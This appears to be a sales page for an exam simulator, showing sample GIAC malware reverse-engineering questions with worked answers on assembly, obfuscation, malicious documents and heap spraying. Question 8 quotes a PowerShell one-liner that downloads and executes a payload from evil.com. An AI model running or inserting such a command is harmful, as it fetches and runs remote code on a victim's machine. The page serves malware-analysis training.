GREM Sample Questions & Answers
Free GIAC Reverse Engineering Malware practice questions with worked answers and explanations. See how the ExamJungle simulator prepares you — then jump into the full test.
Launch the full GREM simulator →Showing 10 of 20 free samples.
- Question 1Advanced
Windows Assembly Code and Reverse Engineering · x86/x64 Assembly Fundamentals
You are analyzing a function call in a 32-bit Windows malware sample. You see the following instructions:
PUSH 0 PUSH 0 PUSH 0 PUSH 0 PUSH OFFSET Command PUSH 0 CALL Kernel32.CreateProcessAIf the malware were compiled for a 64-bit Windows environment, how would the first four parameters be passed to
CreateProcessAaccording to the Microsoft x64 calling convention?Show answer & explanation
Correct answer: A
The Microsoft x64 calling convention (fastcall) requires the first four integer or pointer arguments to be passed in registers RCX, RDX, R8, and R9 respectively. Any additional arguments are pushed onto the stack.
- Question 2Beginner
Windows Assembly Code and Reverse Engineering · Control Flow Analysis
You encounter a routine that iterates through a byte array, performing an XOR operation on each byte with the key 0x5A. What is the primary purpose of this routine in the context of malware analysis?
Show answer & explanation
Correct answer: B
Single-byte XOR encoding is a very common and simple obfuscation technique used by malware to hide strings (like C2 URLs) and payloads from static string analysis tools.
- Question 3Intermediate
Windows Assembly Code and Reverse Engineering · Control Flow Analysis
In x86 assembly, the
TESTinstruction is frequently used before a conditional jump. If you seeTEST EAX, EAXfollowed byJZ (Jump if Zero), what is the code checking?Show answer & explanation
Correct answer: C
TEST EAX, EAXperforms a bitwise AND operation but discards the result, only setting flags. If EAX is zero, the Zero Flag (ZF) is set to 1. TheJZinstruction then jumps if ZF is 1. Essentially, it checks if the register is empty/null/zero. - Question 4Intermediate
Windows Assembly Code and Reverse Engineering · Control Flow Analysis
Which of the following assembly instructions is commonly used in shellcode to calculate the current instruction pointer (EIP) location dynamically, often referred to as 'get_pc' or 'get_eip' technique?
Show answer & explanation
Correct answer: D
Since EIP cannot be accessed directly in x86 (e.g.,
MOV EAX, EIPis invalid), shellcode often uses aCALLto the next instruction (or a near offset). TheCALLpushes the return address (the current IP) onto the stack. The subsequentPOPinstruction then retrieves that address into a register. - Question 5Beginner
Windows Assembly Code and Reverse Engineering · Windows API Analysis
You are reverse engineering a downloader that uses
URLDownloadToFileW. The second parameter is the URL. In the disassembly, you seePUSH EAXbefore the call, where EAX points to a wide string. What character encoding must this string use?Show answer & explanation
Correct answer: A
Windows API functions ending in 'W' (e.g.,
URLDownloadToFileW) expect Wide strings, which in Windows are encoded as UTF-16 Little Endian (2 bytes per character). Functions ending in 'A' expect ASCII/ANSI strings. - Question 6Intermediate
Analyzing Malicious Documents and Scripts · PDF Malware Analysis
You are inspecting a malicious PDF document using
pdf-parser.py. You locate an object with/Type /Actionand/S /JavaScript. However, the script content inside the stream appears to be random alphanumeric characters. What filter should you check for in the object definition to correctly decode this stream?Show answer & explanation
Correct answer: B
PDF streams are often compressed to save space or obfuscate content.
/FlateDecodeindicates zlib compression. You must decompress this stream (e.g., usingpdf-parser -f) to view the actual JavaScript code. - Question 7Beginner
Analyzing Malicious Documents and Scripts · Office Macro Malware
Which of the following VBA events is most commonly used by malicious Word documents to automatically execute code when the document is opened?
Show answer & explanation
Correct answer: A
Document_Open()(and similarlyAutoOpen()) is the standard event handler in VBA that triggers automatically when a Word document is opened. Malware authors rely on this to execute their payload without further user interaction beyond enabling macros. - Question 8Intermediate
Analyzing Malicious Documents and Scripts · Script-Based Malware
You are analyzing a suspicious PowerShell script. You see the command
IEX (New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1'). What is the function ofIEXin this context?Show answer & explanation
Correct answer: B
IEXis an alias forInvoke-Expression. It takes a string and executes it as code within the current PowerShell scope. This is a common technique for 'fileless' malware, as the downloaded payload runs directly in RAM without hitting the disk. - Question 9Advanced
Analyzing Malicious Documents and Scripts · Malicious RTF Analysis
A malicious RTF document uses the CVE-2017-11882 vulnerability. This exploit typically targets which component to achieve code execution?
Show answer & explanation
Correct answer: B
CVE-2017-11882 is a classic stack buffer overflow in the Microsoft Equation Editor (EQNEDT32.EXE), an older component often embedded in RTF/Word documents via OLE objects.
- Question 10Intermediate
Analyzing Malicious Documents and Scripts · PDF Malware Analysis
When analyzing a malicious JavaScript file from a PDF, you observe a large loop repeating a string containing NOP sleds and shellcode. This technique, designed to manipulate memory allocation to position shellcode at a predictable address, is known as:
Show answer & explanation
Correct answer: C
Heap spraying involves allocating large blocks of memory containing a NOP sled and shellcode. The goal is to fill the heap so that a jump to a random or specific high memory address (like 0x0c0c0c0c) will land in the NOP sled and slide into the shellcode.
Ready for the real thing?
The full GREM simulator has every exam-style question, timed mode, and instant scoring.